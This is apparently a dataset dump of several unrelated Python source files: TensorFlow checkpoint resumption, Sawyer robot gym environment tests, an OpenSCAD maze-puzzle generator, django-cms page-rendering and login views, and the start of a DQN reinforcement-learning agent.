  os.environ["LD_LIBRARY_PATH"] += os.pathsep + "/usr/local/cuda/extras/CUPTI/lib64"
  if FLAGS.pretrained_model_checkpoint_path != "":
    print("resume training from saved model: % s" % FLAGS.pretrained_model_checkpoint_path)
  elif tf.gfile.Exists(FLAGS.train_dir):
    # find the largest step number among existing checkpoints
    max_step = -1
    for f in os.listdir(FLAGS.train_dir):
      # BUGFIX: raw string and escaped dot -- the old pattern '^model.ckpt-([\d]+)$'
      # let '.' match any character and relied on a non-raw '\d' escape.
      m = re.search(r'^model\.ckpt-(\d+)$', f)
      if m:
        found = int(m.group(1))
        if found > max_step:
          max_step = found
    if max_step >= 0:
      ckpt = os.path.join(FLAGS.train_dir, 'model.ckpt-%d' % max_step)
      FLAGS.pretrained_model_checkpoint_path = ckpt
      print("resume training from saved model: % s" % ckpt)
  else:
    tf.gfile.MakeDirs(FLAGS.train_dir)
  train()
# Parse flags and dispatch to main() via the TF app runner.
if __name__ == '__main__':
  tf.app.run()
| StarcoderdataPython |
48142 | from cmx import doc
import gym
import numpy as np
from env_wrappers.flat_env import FlatGoalEnv
from sawyer.misc import space2dict, obs2dict
def test_start():
    """Emit the report header and the (hand-written) environment table via cmx."""
    doc @ """
    # Sawyer Blocks Environment
    ## To-do
    - [ ] automatically generate the environment table
    We include the following domains in this test:
    """
    doc.csv @ """
    Name, goal_keys, Action Space, Observation Space
    Reach-v0, "hand"
    Push-v0, "obj_0"
    PushMove-v0, "hand", "obj_0"
    """
def test_reach_reward():
    """Drive the hand toward its goal with a proportional controller.

    The episode must terminate (done=True) within 100 steps, otherwise the
    test raises. Frames are saved to videos/reach.gif.
    """
    doc @ """
    ## sawyer:Reach-v0
    """
    with doc:
        env = gym.make("sawyer:Reach-v0")
        env.seed(100)
        frames = []
        obs = env.reset()
        for step in range(100):
            # gripper dimension does not matter
            act = env.goal['hand'] - obs['hand']
            obs, r, done, info = env.step(np.array([*act, 0]) * 10)
            img = env.render('rgb')
            frames.append(img)
            if done:
                break
        else:
            # for/else: only reached if the loop never breaks
            raise RuntimeError("Reach failed to terminate")
    doc.video(frames, f"videos/reach.gif")
    doc.flush()
def test_reach_flat_goal():
    """Wrap Reach-v0 in FlatGoalEnv and document observation space vs. actual obs."""
    doc @ """
    ### Using FlatGoalEnv Wrapper
    """
    with doc:
        env = gym.make("sawyer:Reach-v0")
        env.seed(100)
        env = FlatGoalEnv(env)
        obs = env.reset()
    with doc("Make sure that the spec agrees with what it returns"):
        doc.yaml(space2dict(env.observation_space))
    with doc:
        doc.yaml(obs2dict(obs))
def test_push():
    """Document the Push-v0 observation space and a sample observation."""
    doc @ """
    ## sawyer:Push-v0
    """
    with doc:
        env = gym.make("sawyer:Push-v0")
        env.seed(100)
        obs = env.reset()
    with doc("Make sure that the spec agrees with what it returns"):
        doc.yaml(space2dict(env.observation_space))
    with doc:
        doc.yaml(obs2dict(obs))
def test_push_flat_goal():
    """Push-v0 wrapped in FlatGoalEnv: spaces vs. actual observation."""
    doc @ """
    ### with FlatGoalEnv Wrapper
    """
    with doc:
        env = gym.make("sawyer:Push-v0")
        env.seed(100)
        env = FlatGoalEnv(env, )
        obs = env.reset()
    with doc("Make sure that the spec agrees with what it returns"):
        doc.yaml(space2dict(env.observation_space))
    with doc:
        doc.yaml(obs2dict(obs))
def test_push_move():
    """PushMove-v0 (push + final hand position goal) wrapped in FlatGoalEnv."""
    doc @ """
    ## sawyer:PushMove-v0 Domain
    This is different from the push domain by the
    additional goal key that specifies the final
    position for the hand.
    """
    with doc:
        env = gym.make("sawyer:PushMove-v0")
        env.seed(100)
        env = FlatGoalEnv(env, )
        obs = env.reset()
    with doc("Make sure that the spec agrees with what it returns"):
        doc.yaml(space2dict(env.observation_space))
    with doc:
        doc.yaml(obs2dict(obs))
def test_pick_place():
    """PickPlace-v0 wrapped in FlatGoalEnv: spaces vs. actual observation."""
    doc @ """
    ## sawyer:PickPlace-v0 Domain
    """
    with doc:
        env = gym.make("sawyer:PickPlace-v0")
        env.seed(100)
        env = FlatGoalEnv(env, )
        obs = env.reset()
    with doc("Make sure that the spec agrees with what it returns"):
        doc.yaml(space2dict(env.observation_space))
    with doc:
        doc.yaml(obs2dict(obs))
def test_pick_place_reward():
    """PickPlace-v0 with goal_keys=['hand']: reach-style termination check.

    Unlike test_reach_reward, failure to terminate is only printed, not
    raised (the raise is deliberately commented out). Frames are saved to
    videos/pick_place.gif.
    """
    doc @ """
    ## sawyer:PickPlace-v0
    We set the goal_key to ['hand',] (the same as the reaching
    task) to test the termination.
    """
    with doc:
        env = gym.make("sawyer:PickPlace-v0", goal_keys=["hand"])
        env.seed(100)
        frames = []
        obs = env.reset()
        for step in range(100):
            act = env.goal['hand'] - obs['hand']
            obs, r, done, info = env.step(np.array([*act, 0]) * 10)
            img = env.render('rgb')
            frames.append(img)
            if done:
                break
        else:
            # raise RuntimeError("Reach failed to terminate")
            print('failed')
            pass
    doc.video(frames, f"videos/pick_place.gif")
    doc.flush()
def test_block_distribution():
    """Visualize the block's initial-position spread across 20 resets.

    The per-pixel minimum over the rendered frames darkens every location a
    block has occupied, exposing the reset distribution in a single image.
    """
    doc @ """
    Show the distribution of the block after initialization
    """
    with doc:
        env = gym.make("sawyer:PickPlace-v0", width=240, height=160)
        env.seed(100)
        frames = []
        for step in range(20):
            obs = env.reset()
            frames.append(env.render('rgb'))
        doc.image(np.min(frames, axis=0))
    doc.flush()
# def test_fetch():
# with doc:
# import gym
# env = gym.make("FetchReach-v1")
#
# assert env.compute_reward is not None
| StarcoderdataPython |
5040339 | import os
import matplotlib
from data import PartNetDataset
from vis_utils import draw_partnet_objects
# Script entry point: load one StructureNet result object and render its
# part hierarchy with semantic colors.
if __name__ =='__main__':
    matplotlib.pyplot.ion()
    # visualize one data
    # NOTE: hard-coded absolute path to a single result file -- adjust per machine.
    obj = PartNetDataset.load_object('/home/zhangxc/tmp/structurenet-master/data/results/pc_ae_chair_image_encoder_test/object-result.json')
    # edge visu: ADJ (red), ROT_SYM (yellow), TRANS_SYM (purple), REF_SYM (black)
    draw_partnet_objects(objects=[obj], object_names=['fig.json'],
                         figsize=(9, 5), leafs_only=True, visu_edges=True,
                         sem_colors_filename='../stats/semantics_colors/Chair.txt')
    print('PartNet Hierarchy: (the number in bracket corresponds to PartNet part_id)')
    print(obj)
372999 | <filename>code/python/src/slub_docsa/data/preprocess/__init__.py<gh_stars>10-100
"""Data pre-processing methods."""
| StarcoderdataPython |
318817 | from collections import namedtuple
# --- Program structure: a program is structs + functions + metadata. ---
Program = namedtuple("Program", ["structs", "funcs", "meta"])
Func = namedtuple("Func", ["name", "params", "insts"])
Struct = namedtuple("Struct", ["name", "ty"])
# A typed identifier: `str` is the textual name, `ty` its type.
Name = namedtuple("Name", ["str", "ty"])
# --- Instructions of the IR. `name` is the destination (where present). ---
BinaryInst = namedtuple("BinaryInst", ["name", "l", "op", "r"])
BinaryOps = ["+", "-", "*", "/"]  # legal `op` values for BinaryInst
ReturnInst = namedtuple("ReturnInst", ["name"])
CallInst = namedtuple("CallInst", ["name", "func_name", "args"])
VarInst = namedtuple("VarInst", ["name", "r"])
AssignInst = namedtuple("AssignInst", ["l", "r"])
NewArrayInst = namedtuple("NewArrayInst", ["name", "elements"])
ArrayGetInst = namedtuple("ArrayGetInst", ["name", "arr", "index"])
ArraySetInst = namedtuple("ArraySetInst", ["arr", "index", "r"])
NewStructInst = namedtuple("NewStructInst", ["name", "values"])
StructGetInst = namedtuple("StructGetInst", ["name", "struct", "index"])
StructSetInst = namedtuple("StructSetInst", ["struct", "index", "r"])
# --- Types. Each gets a custom __str__ for readable type printing. ---
FloatingType = namedtuple("FloatingType", ["name"])
FloatingType.__str__ = lambda self: self.name
FloatType = FloatingType("Float")  # the single shared float type instance
ArrayType = namedtuple("ArrayType", ["element", "length"])
ArrayType.__str__ = lambda self: "[{}]".format(self.element)
StructType = namedtuple("StructType", ["name", "properties"])
# StructType.name is a Name namedtuple, hence `.str` below.
StructType.__str__ = lambda self: self.name.str
class StructValue:
    """Runtime representation of a struct instance.

    Holds the struct's type name together with its ordered field values and
    supports indexed get/set access to individual fields.
    """

    def __init__(self, name, values):
        self.name = name
        self.values = values

    def __repr__(self):
        return "StructValue({}, {})".format(self.name, self.values)

    def __getitem__(self, i):
        return self.values[i]

    def __setitem__(self, i, v):
        self.values[i] = v
def initial_values(params):
    """Build default runtime values for a list of typed parameters.

    Floats receive an increasing counter (0.0, 1.0, ...) assigned in
    depth-first declaration order; arrays and structs are constructed
    recursively from their element/property types.
    """
    counter = 0

    def build(ty):
        nonlocal counter
        if isinstance(ty, FloatingType):
            value = float(counter)
            counter += 1
            return value
        if isinstance(ty, ArrayType):
            # comprehension evaluates left-to-right, preserving counter order
            return [build(ty.element) for _ in range(ty.length)]
        if isinstance(ty, StructType):
            return StructValue(ty.name, [build(prop) for prop in ty.properties])
        raise Exception("Unknown type: {}".format(ty))

    return [build(param.ty) for param in params]
122261 | <filename>main.py<gh_stars>0
#!/usr/bin/env python
# If you keep OpenSCAD in an unusual location, uncomment the following line of code and
# set it to the full path to the openscad executable.
# Note: Windows/python now support forward-slash characters in paths, so please use
# those instead of backslashes which create a lot of confusion in code strings.
# OPENSCAD_PATH = "C:/Program Files/OpenSCAD/openscad"
# do not edit below unless you know what you are doing!
import os
import configparser
import platform
from shutil import copy, rmtree
import shlex
import random as rd
import time
import numpy as np
import math
import re
from PIL import Image
import subprocess as sp
# Debug escape hatch: set to a shell index (0..n) to abort before generating it.
halt = -1  # debug: terminate skipping this shell (0 to n to enable)
# Make sure we have a fresh random seed
rd.seed()
# Overwritten at startup if the installed OpenSCAD supports thread-traversal.
USE_SCAD_THREAD_TRAVERSAL = False
STL_DIR = "stl_files"  # output directory for generated STL shells
PREV_DIR = "prev"      # output directory for PNG maze previews
def openscad():
    """Resolve the OpenSCAD executable to invoke.

    Priority: the OPENSCAD_PATH module constant (if uncommented at the top
    of the file), then the OPENSCAD_PATH environment variable, then a
    per-platform default location.
    """
    try:
        if OPENSCAD_PATH:
            return OPENSCAD_PATH
    except NameError:
        pass  # constant not configured; fall through to env/platform defaults
    env_path = os.getenv("OPENSCAD_PATH")
    if env_path:
        return env_path
    system = platform.system()
    if system == "Darwin":
        return "/Applications/OpenSCAD.app/Contents/MacOS/OpenSCAD"
    if system == "Windows":
        # Note: Windows allows forward slashes now
        return '"C:/Program Files/OpenSCAD/openscad"'
    # Default to linux-friendly CLI program name
    return "openscad"
def prepwd():
    """Recreate the STL and preview output directories as fresh, empty dirs."""
    # Linux and other systems that use PATH variables don't need an absolute
    # executable path configured, so the OpenSCAD binary is not validated here.
    for out_dir in (STL_DIR, PREV_DIR):
        if os.path.exists(out_dir):
            rmtree(out_dir)
        os.mkdir(out_dir)  # default perms: world-writable
def has_scad_threading():
    """Return True if OpenSCAD lists 'thread-traversal' among its experimental features."""
    # Note: OpenSCAD prints its help text on stderr.
    help_text = sp.check_output([openscad(), "--help"],
                                stderr=sp.STDOUT, universal_newlines=True)
    match = re.search(r"enable experimental features:\s(.+?)\n\s*\n",
                      help_text, flags=re.DOTALL)
    if not match:
        return False
    features = re.split(r"\s*\|\s*", match[1])
    return "thread-traversal" in features
def scad_version():
    """Return the OpenSCAD version as a (year, month, day) int tuple, or () on parse failure."""
    cmd = [openscad(), "--version"]
    # Note: the version string comes on stderr.
    out = sp.check_output(cmd, stderr=sp.STDOUT, universal_newlines=True)
    # (Removed a stray copy-pasted feature-list regex whose result was
    # immediately overwritten and never used.)
    m = re.match(r"^\s*OpenSCAD version (\d{4})\.(\d\d)\.(\d\d)\s*$", out)
    return (int(m[1]), int(m[2]), int(m[3])) if m else ()
def execscad(threadid=0):
    """Run OpenSCAD on make_shells.scad, writing STL_DIR/<shell+1>.stl.

    Reads the module globals `shell` (current shell index) and
    USE_SCAD_THREAD_TRAVERSAL (adds the experimental flag when True).
    """
    print("Executing OpenSCAD script...")
    out_stl = os.path.join(os.getcwd(), STL_DIR, str(shell + 1) + ".stl")
    scad_script = os.path.join(os.getcwd(), "make_shells.scad")
    cmd = [openscad()]
    if USE_SCAD_THREAD_TRAVERSAL:
        cmd.append("--enable=thread-traversal")
    cmd += ["-o", out_stl, scad_script]
    print(cmd)
    sp.run(cmd)
def udnbers(n, vi, nc, mw, mh, stag):
for y in range(0, mh):
for x in range(0, mw):
x3 = int((x + stag[y]) % mw)
x2 = [x - 1, x + 1, x, x]
y2 = [y, y, y - 1, y + 1]
for i in range(0, 4):
if stag[y] % mw > 0:
x2[i] = int((x2[i] + mw) % mw)
else:
if x2[i] < 0:
x2[i] = 0
if x2[i] > mw - 1:
x2[i] = mw - 1
if (
not ((x3 == 0 and i == 0) or (x3 == mh - 1 and i == 1))
and y2[i] > -1
and y2[i] < mh
):
n[x, y, i] = vi[int(x2[i]), int(y2[i])] == 0
else:
n[x, y, i] = 0
nc[x, y] = len(np.argwhere(n[x, y].astype("int")))
def genmaze(mw, mh, stag, st, ex):
    """Generate an mw x mh maze by randomized wall-breaking and return its walls.

    walls[x, y, d] == 1 means the wall in direction d (0=L, 1=R, 2=U, 3=D)
    of cell (x, y) is intact. `stag` is the per-row horizontal shift,
    `st`/`ex` the entry/exit columns marked in the preview image. Also
    writes a PNG preview into PREV_DIR; the preview condition and filename
    depend on the module globals i, shell, shells and tpp, and the branch
    bias on the global hbias.
    """
    im = Image.new("L", [2 * mw + 1, 2 * mh + 1], 0)
    visited = np.zeros(mw * mh)
    nbercount = np.zeros(mw * mh)
    nbers = np.ones(mw * mh * 4)
    walls = np.ones(mw * mh * 4)
    # start carving from the middle cell
    r = int((mw * mh) / 2)
    vcount = 1
    visited[r] = 1
    visited = visited.reshape([mw, mh])
    nbers = nbers.reshape([mw, mh, 4])
    nbercount = nbercount.reshape([mw, mh])
    walls = walls.reshape([mw, mh, 4])
    udnbers(nbers, visited, nbercount, mw, mh, stag)
    # grow the maze until every cell has been visited
    while vcount < (mw * mh):
        v = np.transpose(np.nonzero(np.logical_and(visited == 1, nbercount > 0)))
        # choose branch
        r = rd.randint(0, len(v) - 1)
        c = v[r]
        # choose wall to break
        if nbers[c[0], c[1]][0] == 1 or nbers[c[0], c[1]][1] == 1:
            # horizontal bias when possible (hbias widens the draw so that
            # overshoot wraps back onto the horizontal directions)
            r = rd.randint(0, nbercount[c[0], c[1]] - 1 + hbias)
            if r > nbercount[c[0], c[1]] - 1:
                r = int(r - (nbercount[c[0], c[1]]))
                if nbers[c[0], c[1]][0] == 1 and nbers[c[0], c[1]][1] == 1:
                    r = int(r % 2)
                else:
                    r = 0
        else:
            # otherwise just vertical
            r = rd.randint(0, nbercount[c[0], c[1]] - 1)
        n = np.argwhere(nbers[c[0], c[1]])[r]
        # break wall
        walls[c[0], c[1], n] = 0
        c2 = c
        # walls: 0=L 1=R 2=U 3=D
        if n == 0:
            n2 = 1
            c2[0] = c[0] - 1
        elif n == 1:
            n2 = 0
            c2[0] = c[0] + 1
        elif n == 2:
            n2 = 3
            c2[1] = c[1] - 1
        else:
            n2 = 2
            c2[1] = c[1] + 1
        c2[0] = int((c2[0] + mw) % mw)
        # mark the neighbour visited and break its matching wall
        visited[c2[0], c2[1]] = 1
        walls[c2[0], c2[1], n2] = 0
        udnbers(nbers, visited, nbercount, mw, mh, stag)
        vcount = vcount + 1
    # preview
    if ((i == 0 and shell < shells - 1) or (i == 1 and shell > 0)) and tpp != 1:
        im.putpixel((1 + ex * 2, 0), 255)
        im.putpixel((1 + st * 2, mh * 2), 255)
        for y in range(0, mh):
            for x in range(0, mw):
                imx = 1 + x * 2
                imy = 1 + y * 2
                imnx = [imx - 1, imx + 1, imx, imx]
                imny = [imy, imy, imy - 1, imy + 1]
                if visited[x, y] == 1:
                    im.putpixel((imx, imy), 255)
                for idx in range(0, 4):
                    if walls[x, y, idx] == 0:
                        im.putpixel((imnx[idx], imny[idx]), 255)
        if tpp == 2:
            im.save(os.path.join(os.getcwd(), PREV_DIR, str(shell + 1) + "a.png"))
        else:
            im.save(os.path.join(os.getcwd(), PREV_DIR, str(shell + 1) + ".png"))
    return walls
def gen():
    """Generate one shell of the puzzle and advance the global shell counter.

    Computes the shell's diameter and maze grid size, generates the maze,
    writes maze.scad and config.scad, and (unless in a transition pass)
    renders the shell via execscad(). `tpp` tracks the special transition
    shell (double-nub / double-maze). Returns False while more shells
    remain, True once all shells are done.
    """
    global shell
    global d2
    global mh
    global mw
    global i
    global tpp
    if shell < shells:
        if shell == halt:
            exit()
        # entering the transition shell: flag it for special handling below
        if shell + 1 > 0 and shell + 1 < shells and shell + 1 == tp and tpp < 1:
            tpp = -1
        if tpp < 1:
            print("part: " + str(shell + 1))
        wt = mwt
        if tpp < 1:
            # derive this shell's diameter from the previous one (d2)
            if shell == 0:
                d = (mw * us * p) / np.pi + wt - marge * 2
            else:
                if shell == tp:
                    d = d2
                else:
                    d = d2 + us + wt + marge * 2
            if i == 0:
                mw = int(math.ceil((d / p + us) * np.pi / 2 / us))
                if shell == (shells - 2):
                    mh += 1
            else:
                if shell == (shells - 1):
                    mw = int(math.ceil((d / p + us) * np.pi / 2 / us))
                else:
                    mw = int(math.ceil((d2 / p + us) * np.pi / 2 / us))
                mh += 1
        else:
            # second pass over the transition shell
            d = d2 + us + wt + marge * 2
            mw = int(math.ceil((d / p + us) * np.pi / 2 / us))
            mh += 1
        # stag/shift: per-row horizontal offsets for the maze
        stag = np.zeros(mh)
        if stagmode in (1, 2):
            for y in range(0, mh):
                if y == 0 or stagmode == 1:
                    stag[y] = rd.randint(0, mh - 1)
                else:
                    stag[y] = stag[y - 1] + rd.randint(0, mh - 1)
        elif stagmode == 3:
            stag = np.multiply(np.arange(0, mh), stagconst).astype("int")
        # maze: random entry/exit columns, then carve
        st = rd.randint(0, mw - 1)
        ex = rd.randint(0, mw - 1)
        marr = genmaze(int(mw), int(mh), stag, st, ex)
        # encode each cell's open walls as a digit: bit 1 = right, bit 2 = up
        matrix = []
        for y in range(0, mh):
            row = []
            for x in range(0, mw * p):
                x2 = x % mw
                r = marr[x2, y, 1] == 0
                u = marr[x2, y, 3] == 0
                if u and r:
                    row.append("3")
                elif u:
                    row.append("2")
                elif r:
                    row.append("1")
                else:
                    row.append("0")
            matrix.append(f"[{','.join(row)}]")
        s = f"[{','.join(matrix)}];"
        # first maze is written fresh; the transition's second maze is appended
        if tpp < 1:
            maze_num = 1
            open_mode = "w"
        else:
            maze_num = 2
            open_mode = "a+"
        with open("maze.scad", open_mode) as maze:
            maze.write(f"maze{maze_num}=")
            maze.write(
                "\n".join(
                    [
                        s,
                        f"h{maze_num}={mh};",
                        f"w{maze_num}={mw * p};",
                        f"st{maze_num}={st};",
                        f"ex{maze_num}={ex};",
                    ]
                )
            )
        # innermost shell gets a base, outermost gets a lid
        base = 1
        lid = 0
        if shell == shells - 1:
            lid = 1
            base = 0
        if shell > shells - 2:
            mos = 0
        else:
            mos = shells - shell - 2
        with open("config.scad", "w+") as cfg:
            cfg.write(
                "\n".join(
                    [
                        f"p={p};",
                        f"tpp={tpp};",
                        f"is={shell};",
                        f"os={mos};",
                        f"lid={lid};",
                        f"base={base};",
                        f"iw={wt};",
                        f"id={d};",
                        f"s={us};",
                        f"i={i};",
                        f"bd={d + wt * 2 + us * 2};",
                        f"m={marge};",
                    ]
                )
            )
        if shell < shells - 2:
            d2 = d
        # transition bookkeeping: flip maze side / schedule the second pass
        if shell > 0 and shell < shells and shell == tp and tpp < 1:
            if i == 0:  # double nub transition
                tpp = 1
                i = 1
            else:  # double maze transition
                tpp = 2
                i = 0
        else:
            tpp = 0
        if tpp < 1:
            execscad()
        shell = shell + 1
        return False
    else:
        return True
# Interactive entry point: probe the OpenSCAD install, prompt for puzzle
# parameters, read the rest from opt.ini, then generate all shells.
if __name__ == '__main__':
    try:
        prepwd()
        # get scad version:
        if has_scad_threading():
            USE_SCAD_THREAD_TRAVERSAL = (
                input("multi-threading available. use it(y/n)?").lower() == "y"
            )
        version = scad_version()
        if version[0] < 2015:
            input("ERROR: invalid scad version. must be at least 2015.xx.xx .")
            exit(1)
    except FileNotFoundError:
        input("ERROR: Could not find OpenSCAD: " + openscad())
        exit(1)
    d2 = 0
    shell = 0
    # make parts:
    p = abs(int(input("nub count (0=2 nubs,1=3 nubs,2=4 nubs, ...):"))) + 2
    tpp = 0
    hbias = abs(
        int(input("difficulty (hbias); 0=none >0= bias; larger= more difficult:"))
    )
    stagconst = 0
    stagmode = int(input("shift mode (0=none 1=random 2=random change 3=twist):"))
    if stagmode == 3:
        stagconst = abs(int(input("twist amount:")))
    # remaining geometry parameters come from opt.ini [DEFAULT]
    config = configparser.ConfigParser()
    config.read("opt.ini")
    if "DEFAULT" not in config:
        input("ERROR: No DEFAULT section in opt.ini")
        exit(1)
    config = config["DEFAULT"]
    shells = config.getint("levels") + 1  # levels
    marge = config.getfloat("tolerance")
    i = int(config.getboolean("maze_inside"))
    tp = config.getint("transition_shell")
    if tp >= shells:
        tp = 0
    us = config.getfloat("spacing")
    mh = config.getint("units_tall")
    mw = config.getint("units_wide")
    mwt = config.getfloat("wall_thickness")
    # gen() returns True once every shell has been produced
    while not gen():
        continue
    print("done!")
| StarcoderdataPython |
9715865 | <reponame>FidelityInternational/django-cms
# -*- coding: utf-8 -*-
from django.conf import settings
from django.contrib.auth import login as auth_login, REDIRECT_FIELD_NAME
from django.contrib.auth.views import redirect_to_login
from django.core.urlresolvers import reverse
from django.http import HttpResponseRedirect, HttpResponse
from django.utils.cache import patch_cache_control
from django.utils.http import is_safe_url, urlquote
from django.utils.timezone import now
from django.utils.translation import get_language_from_request
from django.views.decorators.http import require_POST
from cms.cache.page import get_page_cache
from cms.exceptions import LanguageError
from cms.forms.login import CMSToolbarLoginForm
from cms.models.pagemodel import TreeNode
from cms.page_rendering import _handle_no_page, render_page, render_object_structure, _render_welcome_page
from cms.toolbar.utils import get_toolbar_from_request
from cms.utils import get_current_site
from cms.utils.conf import get_cms_setting
from cms.utils.i18n import (get_fallback_languages, get_public_languages,
get_redirect_on_fallback, get_language_list,
get_default_language_for_site,
is_language_prefix_patterns_used)
from cms.utils.page import get_page_from_request
from cms.utils.page_permissions import user_can_change_page
def _clean_redirect_url(redirect_url, language):
    """Prefix *redirect_url* with *language* when i18n URL prefixes are active.

    Only non-empty, absolute URLs that do not already start with the
    ``/<language>/`` prefix are rewritten; every other value is returned
    unchanged.
    """
    needs_prefix = (
        bool(redirect_url)
        and is_language_prefix_patterns_used()
        and redirect_url.startswith("/")
        and not redirect_url.startswith('/%s/' % language)
    )
    if not needs_prefix:
        return redirect_url
    # add language prefix to url
    return "/%s/%s" % (language, redirect_url.lstrip("/"))
def details(request, slug):
    """
    The main view of the Django-CMS! Takes a request and a slug, renders the
    page.

    Resolution order: serve from the page cache when permitted, resolve the
    page for the current site, negotiate the request language against the
    page's available translations (falling back or redirecting as
    configured), honour per-page redirects and login requirements, and
    finally render either the page or its structure board.
    """
    response_timestamp = now()
    # Only anonymous, non-toolbar requests may be served from the page cache.
    if get_cms_setting("PAGE_CACHE") and (
        not hasattr(request, 'toolbar') or (
            not request.toolbar.edit_mode_active and
            not request.toolbar.show_toolbar and
            not request.user.is_authenticated()
        )
    ):
        cache_content = get_page_cache(request)
        if cache_content is not None:
            content, headers, expires_datetime = cache_content
            response = HttpResponse(content)
            response.xframe_options_exempt = True
            # Restore the cached headers directly (private HttpResponse API).
            response._headers = headers
            # Recalculate the max-age header for this cached response
            max_age = int(
                (expires_datetime - response_timestamp).total_seconds() + 0.5)
            patch_cache_control(response, max_age=max_age)
            return response
    # Get a Page model object from the request
    site = get_current_site()
    page = get_page_from_request(request, use_path=slug)
    toolbar = get_toolbar_from_request(request)
    tree_nodes = TreeNode.objects.get_for_site(site)
    if not page and not slug and not tree_nodes.exists():
        # render the welcome page if the requested path is root "/"
        # and there's no pages
        return _render_welcome_page(request)
    if not page:
        # raise 404
        # NOTE(review): no return here — _handle_no_page is expected to
        # raise Http404 (confirm in cms.page_rendering), otherwise execution
        # would fall through with page=None and crash below.
        _handle_no_page(request)
    request.current_page = page
    # Staff see all site languages; everyone else only the public ones.
    if hasattr(request, 'user') and request.user.is_staff:
        user_languages = get_language_list(site_id=site.pk)
    else:
        user_languages = get_public_languages(site_id=site.pk)
    request_language = get_language_from_request(request, check_path=True)
    if not page.is_home and request_language not in user_languages:
        # The homepage is treated differently because
        # when a request goes to the root of the site (/)
        # without a language, Django will redirect to the user's
        # browser language which might not be a valid cms language,
        # this means we need to correctly redirect that request.
        return _handle_no_page(request)
    # get_published_languages will return all languages in draft mode
    # and published only in live mode.
    # These languages are then filtered out by the user allowed languages
    available_languages = [
        language for language in user_languages
        if language in list(page.get_published_languages())
    ]
    # All spellings of the current request's URL, used to avoid a redirect
    # loop back to ourselves further down.
    own_urls = [
        request.build_absolute_uri(request.path),
        '/%s' % request.path,
        request.path,
    ]
    try:
        redirect_on_fallback = get_redirect_on_fallback(request_language, site_id=site.pk)
    except LanguageError:
        redirect_on_fallback = False
    if request_language not in user_languages:
        # Language is not allowed
        # Use the default site language
        default_language = get_default_language_for_site(site.pk)
        fallbacks = get_fallback_languages(default_language, site_id=site.pk)
        fallbacks = [default_language] + fallbacks
    else:
        fallbacks = get_fallback_languages(request_language, site_id=site.pk)
    # Only fallback to languages the user is allowed to see
    fallback_languages = [
        language for language in fallbacks
        if language != request_language and language in available_languages
    ]
    language_is_unavailable = request_language not in available_languages
    if language_is_unavailable and not fallback_languages:
        # There is no page with the requested language
        # and there's no configured fallbacks
        return _handle_no_page(request)
    elif language_is_unavailable and (redirect_on_fallback or page.is_home):
        # There is no page with the requested language and
        # the user has explicitly requested to redirect on fallbacks,
        # so redirect to the first configured / available fallback language
        fallback = fallback_languages[0]
        redirect_url = page.get_absolute_url(fallback, fallback=False)
    else:
        page_path = page.get_absolute_url(request_language)
        page_slug = page.get_path(request_language) or page.get_slug(request_language)
        if slug and slug != page_slug and request.path[:len(page_path)] != page_path:
            # The current language does not match its slug.
            # Redirect to the current language.
            return HttpResponseRedirect(page_path)
        # Check if the page has a redirect url defined for this language.
        redirect_url = page.get_redirect(request_language, fallback=False) or ''
        redirect_url = _clean_redirect_url(redirect_url, request_language)
    if redirect_url:
        # In edit mode staff users stay on the page; the toolbar shows the
        # redirect target instead of following it.
        if request.user.is_staff and toolbar.edit_mode_active:
            toolbar.redirect_url = redirect_url
        elif redirect_url not in own_urls:
            # prevent redirect to self
            return HttpResponseRedirect(redirect_url)
    # permission checks
    if page.login_required and not request.user.is_authenticated():
        return redirect_to_login(urlquote(request.get_full_path()), settings.LOGIN_URL)
    if hasattr(request, 'toolbar'):
        request.toolbar.set_object(page)
    # When the toolbar's build/structure GET flag is present and the user may
    # edit the page, render the structure board instead of the page content.
    structure_requested = get_cms_setting('CMS_TOOLBAR_URL__BUILD') in request.GET
    if user_can_change_page(request.user, page) and structure_requested:
        return render_object_structure(request, page)
    return render_page(request, page, current_language=request_language, slug=slug)
@require_POST
def login(request):
    """Authenticate a user posted from the CMS toolbar login form.

    Always responds with a redirect: to the (sanitised) requested target on
    success, or to the same target with a ``cms_toolbar_login_error`` query
    flag when the credentials are rejected. Already-authenticated users are
    redirected straight away without re-processing the form.
    """
    target = request.GET.get(REDIRECT_FIELD_NAME)
    # Never redirect to an off-host URL supplied by the client.
    if not is_safe_url(url=target, host=request.get_host()):
        target = reverse("pages-root")
    if not request.user.is_authenticated():
        form = CMSToolbarLoginForm(request=request, data=request.POST)
        if form.is_valid():
            auth_login(request, form.user_cache)
        else:
            # Signal the toolbar to show its login-error state.
            target = target + u'?cms_toolbar_login_error=1'
    return HttpResponseRedirect(target)
| StarcoderdataPython |
350243 | <filename>game/rl/dqn/model.py<gh_stars>0
import os
from os import path
import numpy as np
import torch
import torch.nn as nn
from torch.optim import Adam
from pathlib import Path
from dataclasses import asdict
from utils.math_utils import to_numpy
from .network import DQN
from .configs.model import ModelConfig
from .utils.experience import Experience
from .utils.replay_memory import ReplayMemory
class Model:
    """DQN agent: policy/target networks, replay memory and training loop.

    The policy network is optimised on minibatches drawn from replay
    memory; the target network is a periodically synchronised copy used to
    compute the bootstrap targets (standard DQN with a target network).
    """
    def __init__(self, config: ModelConfig) -> None:
        self.config = config
        self.memory = ReplayMemory(config.memory)
        self.policy_net = DQN(config.dqn).to(config.device)
        self.target_net = DQN(config.dqn).to(config.device)
        self.criterion = nn.SmoothL1Loss()  # Huber loss: robust to outlier TD errors
        self.optimizer = Adam(self.policy_net.parameters(), lr=config.lr)
        self.step: int = 0  # optimisation steps performed so far
        self.history: list[float] = []  # per-step training losses
        # Resume from disk if a checkpoint exists; otherwise copy the fresh
        # policy weights into the target network (update_target_net=True).
        self.load_checkpoint(update_target_net=True)
        self.target_net.eval()
    def evaluate(self, state: np.ndarray) -> np.ndarray:
        """Return the policy network's action values for one *state*.

        A batch axis is prepended before the forward pass and stripped from
        the result. Assumes *state* is a single unbatched observation —
        TODO confirm the expected shape against DQN's input layer.
        """
        state = torch.tensor(state[np.newaxis, :], device=self.config.device)
        with torch.no_grad():
            values = self.policy_net(state)[0]
        return to_numpy(values)
    def __get_train_batch(self) -> dict[str, torch.Tensor]:
        """Sample a minibatch and collate it into one tensor per field.

        Experience must be a dataclass: asdict() on the first sample
        supplies the field names; each field is stacked with np.array into a
        single contiguous tensor on the configured device.
        """
        samples = self.memory.sample(self.config.batch_size)
        batch = {
            key: torch.tensor(
                np.array(
                    [getattr(sample, key) for sample in samples],
                ),
                device=self.config.device,
            )
            for key in asdict(samples[0])
        }
        return batch
    def train(self, experience: Experience) -> None:
        """Store *experience* and run one optimisation step once warmed up.

        No training happens until the memory holds at least
        ``config.train_start`` items.
        """
        self.memory.push(experience)
